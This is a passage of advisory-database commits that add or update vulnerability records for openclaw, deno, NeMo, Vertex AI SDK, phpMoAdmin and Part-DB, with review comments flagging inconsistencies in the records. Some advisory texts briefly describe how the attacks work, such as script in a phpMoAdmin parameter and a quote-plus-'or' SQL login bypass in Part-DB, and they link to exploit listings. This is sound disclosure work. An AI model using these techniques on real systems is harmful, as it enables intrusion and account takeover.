inter-block newline separator bytes during pre-concatenation size checks\n- Keep final outbound message-size validation before `chat.send`\n- Avoid stale active-run session state when oversized prompts are rejected\n- Add regression tests for oversize rejection and active-run cleanup\n\n## Fix Commit(s)\n\n- `732e53151e8fbdfc0501182ddb0e900878bdc1e3`\n- `ebcf19746f5c500a41817e03abecadea8655654a`\n- `63e39d7f57ac4ad4a5e38d17e7394ae7c4dd0b9c`\n\nThanks @aether-ai-agent for reporting.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "openclaw" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + 
"introduced": "0" + }, + { + "fixed": "2026.2.19" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 2026.2.17" + } + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-cxpw-2g23-2vgw" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/63e39d7f57ac4ad4a5e38d17e7394ae7c4dd0b9c" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/8ae2d5110f6ceadef73822aa3db194fb60d2ba68" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/ebcf19746f5c500a41817e03abecadea8655654a" + }, + { + "type": "PACKAGE", + "url": "https://github.com/openclaw/openclaw" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.2.19" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-400" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2026-02-20T21:52:44Z", + "nvd_published_at": null + } +} \ No newline at end of file From a8170f74a7a86d90b94b600d04b96c97493d693d Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 20 Feb 2026 22:21:27 +0000 Subject: [PATCH 29/77] Publish Advisories GHSA-hmh4-3xvx-q5hr GHSA-m7jm-9gc2-mpf2 --- .../2026/02/GHSA-hmh4-3xvx-q5hr/GHSA-hmh4-3xvx-q5hr.json | 8 ++++++-- .../2026/02/GHSA-m7jm-9gc2-mpf2/GHSA-m7jm-9gc2-mpf2.json | 8 ++++++-- 2 files changed, 12 insertions(+), 4 deletions(-) diff --git a/advisories/github-reviewed/2026/02/GHSA-hmh4-3xvx-q5hr/GHSA-hmh4-3xvx-q5hr.json b/advisories/github-reviewed/2026/02/GHSA-hmh4-3xvx-q5hr/GHSA-hmh4-3xvx-q5hr.json index 75802a5ccab73..6dc5aebef00cd 100644 --- a/advisories/github-reviewed/2026/02/GHSA-hmh4-3xvx-q5hr/GHSA-hmh4-3xvx-q5hr.json +++ b/advisories/github-reviewed/2026/02/GHSA-hmh4-3xvx-q5hr/GHSA-hmh4-3xvx-q5hr.json 
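Review bot: The new GHSA-cxpw-2g23-2vgw record disagrees with itself on the fixed version: `details` says "Patched version: 2026.2.18 (planned next release)", while `ranges` has `"fixed": "2026.2.19"`, the release reference is `v2026.2.19`, and `last_known_affected_version_range` is `<= 2026.2.17`. That leaves 2026.2.18 undefined for scanners and for anyone reading the prose. The fix-commit lists differ as well: `details` names `732e53151e8fbdfc0501182ddb0e900878bdc1e3`, which is absent from `references`, and `references` carries `8ae2d5110f6ceadef73822aa3db194fb60d2ba68`, which `details` does not mention. Align the prose with the structured data, e.g. `- Patched version: 2026.2.19`, and make the two commit lists match.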
@@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-hmh4-3xvx-q5hr", - "modified": "2026-02-19T20:31:41Z", + "modified": "2026-02-20T22:20:03Z", "published": "2026-02-19T20:31:41Z", "aliases": [ "CVE-2026-27190" @@ -40,6 +40,10 @@ "type": "WEB", "url": "https://github.com/denoland/deno/security/advisories/GHSA-hmh4-3xvx-q5hr" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27190" + }, { "type": "WEB", "url": "https://github.com/denoland/deno/commit/9132ad958c83a0d0b199de12b69b877f63edab4c" @@ -60,6 +64,6 @@ "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2026-02-19T20:31:41Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-20T21:19:28Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-m7jm-9gc2-mpf2/GHSA-m7jm-9gc2-mpf2.json b/advisories/github-reviewed/2026/02/GHSA-m7jm-9gc2-mpf2/GHSA-m7jm-9gc2-mpf2.json index 00a2eb0601e16..a514f5842822e 100644 --- a/advisories/github-reviewed/2026/02/GHSA-m7jm-9gc2-mpf2/GHSA-m7jm-9gc2-mpf2.json +++ b/advisories/github-reviewed/2026/02/GHSA-m7jm-9gc2-mpf2/GHSA-m7jm-9gc2-mpf2.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-m7jm-9gc2-mpf2", - "modified": "2026-02-20T18:23:54Z", + "modified": "2026-02-20T22:19:56Z", "published": "2026-02-20T18:23:54Z", "aliases": [ "CVE-2026-25896" @@ -40,6 +40,10 @@ "type": "WEB", "url": "https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-m7jm-9gc2-mpf2" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25896" + }, { "type": "WEB", "url": "https://github.com/NaturalIntelligence/fast-xml-parser/commit/943ef0eb1b2d3284e72dd74f44a042ee9f07026e" @@ -64,6 +68,6 @@ "severity": "CRITICAL", "github_reviewed": true, "github_reviewed_at": "2026-02-20T18:23:54Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-20T21:19:27Z" } } \ No newline at end of file From 583028de4a3f1c555d7869c86e8bd1ba621cf357 Mon Sep 17 00:00:00 2001 
From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 20 Feb 2026 22:39:01 +0000 Subject: [PATCH 30/77] Publish Advisories GHSA-9379-mwvr-7wxx GHSA-hvjw-vp7g-39h5 --- .../GHSA-9379-mwvr-7wxx.json | 33 ++++++++++++++++--- .../GHSA-hvjw-vp7g-39h5.json | 33 ++++++++++++++++--- 2 files changed, 58 insertions(+), 8 deletions(-) rename advisories/{unreviewed => github-reviewed}/2026/02/GHSA-9379-mwvr-7wxx/GHSA-9379-mwvr-7wxx.json (59%) rename advisories/{unreviewed => github-reviewed}/2026/02/GHSA-hvjw-vp7g-39h5/GHSA-hvjw-vp7g-39h5.json (62%) diff --git a/advisories/unreviewed/2026/02/GHSA-9379-mwvr-7wxx/GHSA-9379-mwvr-7wxx.json b/advisories/github-reviewed/2026/02/GHSA-9379-mwvr-7wxx/GHSA-9379-mwvr-7wxx.json similarity index 59% rename from advisories/unreviewed/2026/02/GHSA-9379-mwvr-7wxx/GHSA-9379-mwvr-7wxx.json rename to advisories/github-reviewed/2026/02/GHSA-9379-mwvr-7wxx/GHSA-9379-mwvr-7wxx.json index 6ec1cf8e8ebf9..1ce765c5fc98b 100644 --- a/advisories/unreviewed/2026/02/GHSA-9379-mwvr-7wxx/GHSA-9379-mwvr-7wxx.json +++ b/advisories/github-reviewed/2026/02/GHSA-9379-mwvr-7wxx/GHSA-9379-mwvr-7wxx.json @@ -1,11 +1,12 @@ { "schema_version": "1.4.0", "id": "GHSA-9379-mwvr-7wxx", - "modified": "2026-02-18T15:31:25Z", + "modified": "2026-02-20T22:37:11Z", "published": "2026-02-18T15:31:25Z", "aliases": [ "CVE-2025-33245" ], + "summary": "NVIDIA NeMo Framework contains a vulnerability where malicious data could cause remote code execution", "details": "NVIDIA NeMo Framework contains a vulnerability where malicious data could cause remote code execution. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, information disclosure, and data tampering.", "severity": [ { 
@@ -13,12 +14,36 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "nemo-toolkit" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2.6.1" + } + ] + } + ] + } + ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-33245" }, + { + "type": "PACKAGE", + "url": "https://github.com/NVIDIA-NeMo/NeMo" + }, { "type": "WEB", "url": "https://nvidia.custhelp.com/app/answers/detail/a_id/5762" @@ -33,8 +58,8 @@ "CWE-502" ], "severity": "HIGH", - "github_reviewed": false, - "github_reviewed_at": null, + "github_reviewed": true, + "github_reviewed_at": "2026-02-20T22:37:11Z", "nvd_published_at": "2026-02-18T14:16:03Z" } } \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-hvjw-vp7g-39h5/GHSA-hvjw-vp7g-39h5.json b/advisories/github-reviewed/2026/02/GHSA-hvjw-vp7g-39h5/GHSA-hvjw-vp7g-39h5.json similarity index 62% rename from advisories/unreviewed/2026/02/GHSA-hvjw-vp7g-39h5/GHSA-hvjw-vp7g-39h5.json rename to advisories/github-reviewed/2026/02/GHSA-hvjw-vp7g-39h5/GHSA-hvjw-vp7g-39h5.json index 7228d86753e3b..9ac6c3e957650 100644 --- a/advisories/unreviewed/2026/02/GHSA-hvjw-vp7g-39h5/GHSA-hvjw-vp7g-39h5.json +++ b/advisories/github-reviewed/2026/02/GHSA-hvjw-vp7g-39h5/GHSA-hvjw-vp7g-39h5.json 
@@ -1,11 +1,12 @@ { "schema_version": "1.4.0", "id": "GHSA-hvjw-vp7g-39h5", - "modified": "2026-02-18T15:31:26Z", + "modified": "2026-02-20T22:37:37Z", "published": "2026-02-18T15:31:26Z", "aliases": [ "CVE-2025-33253" ], + "summary": "NVIDIA NeMo Framework Deserializes Untrusted Data", "details": "NVIDIA NeMo Framework contains a vulnerability where an attacker could cause remote code execution by convincing a user to load a maliciously crafted file. A successful exploit of this vulnerability might lead to code execution, denial of service, information disclosure, and data tampering.", "severity": [ { @@ -13,12 +14,36 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "nemo-toolkit" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2.6.1" + } + ] + } + ] + } + ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-33253" }, + { + "type": "PACKAGE", + "url": "https://github.com/NVIDIA-NeMo/NeMo" + }, { "type": "WEB", "url": "https://nvidia.custhelp.com/app/answers/detail/a_id/5762" @@ -33,8 +58,8 @@ "CWE-502" ], "severity": "HIGH", - "github_reviewed": false, - "github_reviewed_at": null, + "github_reviewed": true, + "github_reviewed_at": "2026-02-20T22:37:17Z", "nvd_published_at": "2026-02-18T14:16:04Z" } } \ No newline at end of file From 7b171aa127919b8b82302bbd3a3c6d2eec4d27c2 Mon Sep 17 00:00:00 2001 
From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 20 Feb 2026 22:43:10 +0000 Subject: [PATCH 31/77] Publish Advisories GHSA-qv8j-hgpc-vrq8 GHSA-wh2j-26j7-9728 --- .../GHSA-qv8j-hgpc-vrq8.json | 43 ++++++++++++++++--- .../GHSA-wh2j-26j7-9728.json | 39 ++++++++++++++--- 2 files changed, 72 insertions(+), 10 deletions(-) rename advisories/{unreviewed => github-reviewed}/2026/02/GHSA-qv8j-hgpc-vrq8/GHSA-qv8j-hgpc-vrq8.json (52%) rename advisories/{unreviewed => github-reviewed}/2026/02/GHSA-wh2j-26j7-9728/GHSA-wh2j-26j7-9728.json (56%) diff --git a/advisories/unreviewed/2026/02/GHSA-qv8j-hgpc-vrq8/GHSA-qv8j-hgpc-vrq8.json b/advisories/github-reviewed/2026/02/GHSA-qv8j-hgpc-vrq8/GHSA-qv8j-hgpc-vrq8.json similarity index 52% rename from advisories/unreviewed/2026/02/GHSA-qv8j-hgpc-vrq8/GHSA-qv8j-hgpc-vrq8.json rename to advisories/github-reviewed/2026/02/GHSA-qv8j-hgpc-vrq8/GHSA-qv8j-hgpc-vrq8.json index 713c3e2275151..b99aff96227c0 100644 --- a/advisories/unreviewed/2026/02/GHSA-qv8j-hgpc-vrq8/GHSA-qv8j-hgpc-vrq8.json +++ b/advisories/github-reviewed/2026/02/GHSA-qv8j-hgpc-vrq8/GHSA-qv8j-hgpc-vrq8.json 
@@ -1,27 +1,60 @@ { "schema_version": "1.4.0", "id": "GHSA-qv8j-hgpc-vrq8", - "modified": "2026-02-20T21:31:24Z", + "modified": "2026-02-20T22:41:45Z", "published": "2026-02-20T21:31:24Z", "aliases": [ "CVE-2026-2472" ], + "summary": "Google Cloud Vertex AI SDK affected by Stored Cross-Site Scripting (XSS)", "details": "Stored Cross-Site Scripting (XSS) in the _genai/_evals_visualization component of Google Cloud Vertex AI SDK (google-cloud-aiplatform) versions from 1.98.0 up to (but not including) 1.131.0 allows an unauthenticated remote attacker to execute arbitrary JavaScript in a victim's Jupyter or Colab environment via injecting script escape sequences into model evaluation results or dataset JSON data.", "severity": [ { "type": "CVSS_V4", - "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:Amber" + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L/U:Amber" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "google-cloud-aiplatform" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.98.0" + }, + { + "fixed": "1.131.0" + } + ] + } + ] } ], - "affected": [], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2472" }, + { + "type": "WEB", + "url": "https://github.com/googleapis/python-aiplatform/commit/8a00d43dbd24e95dbab6ea32c63ce0a5a1849480" + }, { "type": "WEB", "url": "https://docs.cloud.google.com/support/bulletins#gcp-2026-011" + }, + { + "type": "PACKAGE", + "url": "https://github.com/googleapis/python-aiplatform" + }, + { + "type": "WEB", + "url": "https://github.com/googleapis/python-aiplatform/releases/tag/v1.131.0" } ], "database_specific": { 
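Review bot: The trimmed CVSS v4 vector kept in GHSA-qv8j-hgpc-vrq8 scores `PR:L`, but the `details` text in the same hunk describes "an unauthenticated remote attacker"; one of the two is off, and moving the record to `github-reviewed` endorses both. If no privileges are needed the metric would be `PR:N`, which changes the score; if the attacker needs some access to the evaluation results or dataset JSON, the prose should say so. This is worth confirming against the Google bulletin already listed in `references` before the record is published as reviewed.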
@@ -29,8 +62,8 @@ "CWE-79" ], "severity": "HIGH", - "github_reviewed": false, - "github_reviewed_at": null, + "github_reviewed": true, + "github_reviewed_at": "2026-02-20T22:41:44Z", "nvd_published_at": "2026-02-20T20:25:24Z" } } \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wh2j-26j7-9728/GHSA-wh2j-26j7-9728.json b/advisories/github-reviewed/2026/02/GHSA-wh2j-26j7-9728/GHSA-wh2j-26j7-9728.json similarity index 56% rename from advisories/unreviewed/2026/02/GHSA-wh2j-26j7-9728/GHSA-wh2j-26j7-9728.json rename to advisories/github-reviewed/2026/02/GHSA-wh2j-26j7-9728/GHSA-wh2j-26j7-9728.json index c06ed9f12a507..b1836d0d7ff3a 100644 --- a/advisories/unreviewed/2026/02/GHSA-wh2j-26j7-9728/GHSA-wh2j-26j7-9728.json +++ b/advisories/github-reviewed/2026/02/GHSA-wh2j-26j7-9728/GHSA-wh2j-26j7-9728.json 
@@ -1,19 +1,40 @@ { "schema_version": "1.4.0", "id": "GHSA-wh2j-26j7-9728", - "modified": "2026-02-20T21:31:24Z", + "modified": "2026-02-20T22:41:41Z", "published": "2026-02-20T21:31:24Z", "aliases": [ "CVE-2026-2473" ], + "summary": "Google Cloud Vertex AI has a a vulnerability involving predictable bucket naming", "details": "Predictable bucket naming in Vertex AI Experiments in Google Cloud Vertex AI from version 1.21.0 up to (but not including) 1.133.0 on Google Cloud Platform allows an unauthenticated remote attacker to achieve cross-tenant remote code execution, model theft, and poisoning via pre-creating predictably named Cloud Storage buckets (Bucket Squatting).\n\nThis vulnerability was patched and no customer action is needed.", "severity": [ { "type": "CVSS_V4", - "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:Clear" + "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/U:Clear" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "google-cloud-aiplatform" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.21.0" + }, + { + "fixed": "1.133.0" + } + ] + } + ] } ], - "affected": [], "references": [ { "type": "ADVISORY", @@ -22,6 +43,14 @@ { "type": "WEB", "url": "https://docs.cloud.google.com/support/bulletins#gcp-2026-012" + }, + { + "type": "PACKAGE", + "url": "https://github.com/googleapis/python-aiplatform" + }, + { + "type": "WEB", + "url": "https://github.com/googleapis/python-aiplatform/releases/tag/v1.133.0" } ], "database_specific": { @@ -29,8 +58,8 @@ "CWE-340" ], "severity": "HIGH", - "github_reviewed": false, - "github_reviewed_at": null, + "github_reviewed": true, + "github_reviewed_at": "2026-02-20T22:41:41Z", "nvd_published_at": "2026-02-20T20:25:24Z" } } \ No newline at end of file 
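Review bot: The summary added to GHSA-wh2j-26j7-9728 has a doubled article, `has a a vulnerability`; it should read `"summary": "Google Cloud Vertex AI has a vulnerability involving predictable bucket naming",`. Separately, `details` ends with "no customer action is needed", while the new `affected` block marks `google-cloud-aiplatform` from 1.21.0 up to 1.133.0 as vulnerable, so users pinned in that range will get an alert that the text tells them to ignore. The record should state whether upgrading the SDK is required or whether the fix was service-side only.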
From c0da40ae0be697a1671c5f7c16c52d7c857b7ad5 Mon Sep 17 00:00:00 2001 
From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Sat, 21 Feb 2026 00:33:03 +0000 Subject: [PATCH 32/77] Advisory Database Sync --- .../GHSA-2h8m-3jwj-j68m.json | 48 +++++++++++++++ .../GHSA-2wwg-wcjv-q464.json | 48 +++++++++++++++ .../GHSA-4cqv-6xj6-7w79.json | 36 +++++++++++ .../GHSA-4jqp-h8f8-5fh9.json | 40 +++++++++++++ .../GHSA-59vc-4mm8-j289.json | 48 +++++++++++++++ .../GHSA-65c4-vf29-7265.json | 48 +++++++++++++++ .../GHSA-6q4c-4x29-76qv.json | 40 +++++++++++++ .../GHSA-7c63-32m9-7mfg.json | 40 +++++++++++++ .../GHSA-7h2v-5mq4-f627.json | 36 +++++++++++ .../GHSA-8j7g-rjc3-pcjw.json | 48 +++++++++++++++ .../GHSA-8pcr-7mgm-xjqp.json | 48 +++++++++++++++ .../GHSA-8r4q-6953-w8gp.json | 36 +++++++++++ .../GHSA-8w2x-hhv3-2m76.json | 48 +++++++++++++++ .../GHSA-974r-v62q-8fqc.json | 40 +++++++++++++ .../GHSA-9j8v-79v3-wcmp.json | 36 +++++++++++ .../GHSA-9pq7-r6qx-2rhf.json | 40 +++++++++++++ .../GHSA-9xmv-j327-gw5g.json | 40 +++++++++++++ .../GHSA-c478-8rj5-w9cv.json | 48 +++++++++++++++ .../GHSA-fhrj-59h8-j7gf.json | 48 +++++++++++++++ .../GHSA-fjxv-44q5-26f4.json | 48 +++++++++++++++ .../GHSA-gq3w-7jj3-x7gr.json | 40 +++++++++++++ .../GHSA-hc96-x3gj-mp7g.json | 48 +++++++++++++++ .../GHSA-q2r8-vmq7-fpx2.json | 40 +++++++++++++ .../GHSA-q2wq-f7jq-885v.json | 48 +++++++++++++++ .../GHSA-q77w-wghg-55fv.json | 40 +++++++++++++ .../GHSA-q8fp-vccx-9w2h.json | 36 +++++++++++ .../GHSA-qp8f-9474-hr27.json | 40 +++++++++++++ .../GHSA-qqfx-94p8-6p39.json | 48 +++++++++++++++ .../GHSA-r872-6r9v-fwgg.json | 48 +++++++++++++++ .../GHSA-rc45-jprg-5pmq.json | 36 +++++++++++ .../GHSA-rwr9-9r33-h7x4.json | 40 +++++++++++++ .../GHSA-vm4c-6g35-79xf.json | 60 +++++++++++++++++++ .../GHSA-w9fh-vjwm-p6c4.json | 48 +++++++++++++++ .../GHSA-wx92-h8q5-hfm6.json | 40 +++++++++++++ .../GHSA-xhcq-9mcp-rrvr.json | 40 +++++++++++++ .../GHSA-xwhr-hxqf-pv44.json | 36 +++++++++++ 36 files changed, 1552 insertions(+) create mode 100644 
advisories/unreviewed/2026/02/GHSA-2h8m-3jwj-j68m/GHSA-2h8m-3jwj-j68m.json create mode 100644 advisories/unreviewed/2026/02/GHSA-2wwg-wcjv-q464/GHSA-2wwg-wcjv-q464.json create mode 100644 advisories/unreviewed/2026/02/GHSA-4cqv-6xj6-7w79/GHSA-4cqv-6xj6-7w79.json create mode 100644 advisories/unreviewed/2026/02/GHSA-4jqp-h8f8-5fh9/GHSA-4jqp-h8f8-5fh9.json create mode 100644 advisories/unreviewed/2026/02/GHSA-59vc-4mm8-j289/GHSA-59vc-4mm8-j289.json create mode 100644 advisories/unreviewed/2026/02/GHSA-65c4-vf29-7265/GHSA-65c4-vf29-7265.json create mode 100644 advisories/unreviewed/2026/02/GHSA-6q4c-4x29-76qv/GHSA-6q4c-4x29-76qv.json create mode 100644 advisories/unreviewed/2026/02/GHSA-7c63-32m9-7mfg/GHSA-7c63-32m9-7mfg.json create mode 100644 advisories/unreviewed/2026/02/GHSA-7h2v-5mq4-f627/GHSA-7h2v-5mq4-f627.json create mode 100644 advisories/unreviewed/2026/02/GHSA-8j7g-rjc3-pcjw/GHSA-8j7g-rjc3-pcjw.json create mode 100644 advisories/unreviewed/2026/02/GHSA-8pcr-7mgm-xjqp/GHSA-8pcr-7mgm-xjqp.json create mode 100644 advisories/unreviewed/2026/02/GHSA-8r4q-6953-w8gp/GHSA-8r4q-6953-w8gp.json create mode 100644 advisories/unreviewed/2026/02/GHSA-8w2x-hhv3-2m76/GHSA-8w2x-hhv3-2m76.json create mode 100644 advisories/unreviewed/2026/02/GHSA-974r-v62q-8fqc/GHSA-974r-v62q-8fqc.json create mode 100644 advisories/unreviewed/2026/02/GHSA-9j8v-79v3-wcmp/GHSA-9j8v-79v3-wcmp.json create mode 100644 advisories/unreviewed/2026/02/GHSA-9pq7-r6qx-2rhf/GHSA-9pq7-r6qx-2rhf.json create mode 100644 advisories/unreviewed/2026/02/GHSA-9xmv-j327-gw5g/GHSA-9xmv-j327-gw5g.json create mode 100644 advisories/unreviewed/2026/02/GHSA-c478-8rj5-w9cv/GHSA-c478-8rj5-w9cv.json create mode 100644 advisories/unreviewed/2026/02/GHSA-fhrj-59h8-j7gf/GHSA-fhrj-59h8-j7gf.json create mode 100644 advisories/unreviewed/2026/02/GHSA-fjxv-44q5-26f4/GHSA-fjxv-44q5-26f4.json create mode 100644 advisories/unreviewed/2026/02/GHSA-gq3w-7jj3-x7gr/GHSA-gq3w-7jj3-x7gr.json create mode 100644 
advisories/unreviewed/2026/02/GHSA-hc96-x3gj-mp7g/GHSA-hc96-x3gj-mp7g.json create mode 100644 advisories/unreviewed/2026/02/GHSA-q2r8-vmq7-fpx2/GHSA-q2r8-vmq7-fpx2.json create mode 100644 advisories/unreviewed/2026/02/GHSA-q2wq-f7jq-885v/GHSA-q2wq-f7jq-885v.json create mode 100644 advisories/unreviewed/2026/02/GHSA-q77w-wghg-55fv/GHSA-q77w-wghg-55fv.json create mode 100644 advisories/unreviewed/2026/02/GHSA-q8fp-vccx-9w2h/GHSA-q8fp-vccx-9w2h.json create mode 100644 advisories/unreviewed/2026/02/GHSA-qp8f-9474-hr27/GHSA-qp8f-9474-hr27.json create mode 100644 advisories/unreviewed/2026/02/GHSA-qqfx-94p8-6p39/GHSA-qqfx-94p8-6p39.json create mode 100644 advisories/unreviewed/2026/02/GHSA-r872-6r9v-fwgg/GHSA-r872-6r9v-fwgg.json create mode 100644 advisories/unreviewed/2026/02/GHSA-rc45-jprg-5pmq/GHSA-rc45-jprg-5pmq.json create mode 100644 advisories/unreviewed/2026/02/GHSA-rwr9-9r33-h7x4/GHSA-rwr9-9r33-h7x4.json create mode 100644 advisories/unreviewed/2026/02/GHSA-vm4c-6g35-79xf/GHSA-vm4c-6g35-79xf.json create mode 100644 advisories/unreviewed/2026/02/GHSA-w9fh-vjwm-p6c4/GHSA-w9fh-vjwm-p6c4.json create mode 100644 advisories/unreviewed/2026/02/GHSA-wx92-h8q5-hfm6/GHSA-wx92-h8q5-hfm6.json create mode 100644 advisories/unreviewed/2026/02/GHSA-xhcq-9mcp-rrvr/GHSA-xhcq-9mcp-rrvr.json create mode 100644 advisories/unreviewed/2026/02/GHSA-xwhr-hxqf-pv44/GHSA-xwhr-hxqf-pv44.json diff --git a/advisories/unreviewed/2026/02/GHSA-2h8m-3jwj-j68m/GHSA-2h8m-3jwj-j68m.json b/advisories/unreviewed/2026/02/GHSA-2h8m-3jwj-j68m/GHSA-2h8m-3jwj-j68m.json new file mode 100644 index 0000000000000..f8cf81062ab8b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-2h8m-3jwj-j68m/GHSA-2h8m-3jwj-j68m.json 
@@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2h8m-3jwj-j68m", + "modified": "2026-02-21T00:31:43Z", + "published": "2026-02-21T00:31:43Z", + "aliases": [ + "CVE-2019-25454" + ], + "details": "phpMoAdmin 1.1.5 contains a stored cross-site scripting vulnerability that allows unauthenticated attackers to inject malicious scripts by manipulating the collection parameter. Attackers can send GET requests to moadmin.php with script payloads in the collection parameter during collection creation to execute arbitrary JavaScript in users' browsers.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25454" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/46082" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/phpmoadmin-stored-cross-site-scripting-via-collection-parameter" + }, + { + "type": "WEB", + "url": "http://www.phpmoadmin.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T23:16:02Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-2wwg-wcjv-q464/GHSA-2wwg-wcjv-q464.json b/advisories/unreviewed/2026/02/GHSA-2wwg-wcjv-q464/GHSA-2wwg-wcjv-q464.json new file mode 100644 index 0000000000000..cee8affb6995a --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-2wwg-wcjv-q464/GHSA-2wwg-wcjv-q464.json 
@@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2wwg-wcjv-q464", + "modified": "2026-02-21T00:31:42Z", + "published": "2026-02-21T00:31:42Z", + "aliases": [ + "CVE-2019-25432" + ], + "details": "Part-DB 0.4 contains an authentication bypass vulnerability that allows unauthenticated attackers to login by injecting SQL syntax into authentication parameters. Attackers can submit a single quote followed by 'or' in the login form to bypass credential validation and gain unauthorized access to the application.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25432" + }, + { + "type": "WEB", + "url": "https://github.com/Part-DB/Part-DB" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47547" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/part-db-authentication-bypass-via-loginphp" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T23:15:59Z" + } +} \ No newline at end of file diff --git 